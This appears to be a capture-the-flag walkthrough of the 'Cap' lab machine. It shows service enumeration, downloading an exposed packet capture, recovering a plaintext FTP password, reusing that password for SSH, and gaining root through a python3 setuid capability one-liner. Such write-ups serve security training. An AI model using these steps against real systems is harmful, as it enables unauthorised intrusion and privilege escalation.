Cap

Enumeration

nmap -sV 10.129.228.42

Port 80 is open. Let's check it by entering the IP address in our browser.

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u 10.129.228.42

Now let's open our browser again and check:

10.129.228.42/data
10.129.228.42/ip
10.129.228.42/netstat

10.129.228.42/data seems interesting. I tried several combinations but found something interesting with 10.129.228.42/data/0

If you type 10.129.228.42/data/0 in your browser, you find a file to download.

Download the file. It is called 0.pcap

Looks like a pcap file, so let's open Wireshark and look more into it.

In Parrot machine, go to Applications --> Pentesting --> Sniffing and Spoofing --> wireshark

Once Wireshark loads, Click on File --> Open

Locate your 0.pcap file and click on open

In the filter field, type FTP to filter only the FTP protocol. We can see the password used by Nathan in plaintext!

Foothold

We know that ssh is open too so let's try that:

ssh nathan@10.129.228.42

You are prompted to enter a password. Enter the password we just found.

The credentials worked and we are in.

ls

cat user.txt

You got your flag!

Privilege Escalation

id

getcap -r / 2>/dev/null

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Now we are root!

id

ls

cd /root

ls

cat root.txt

Now we got the root flag too!

Congratulations!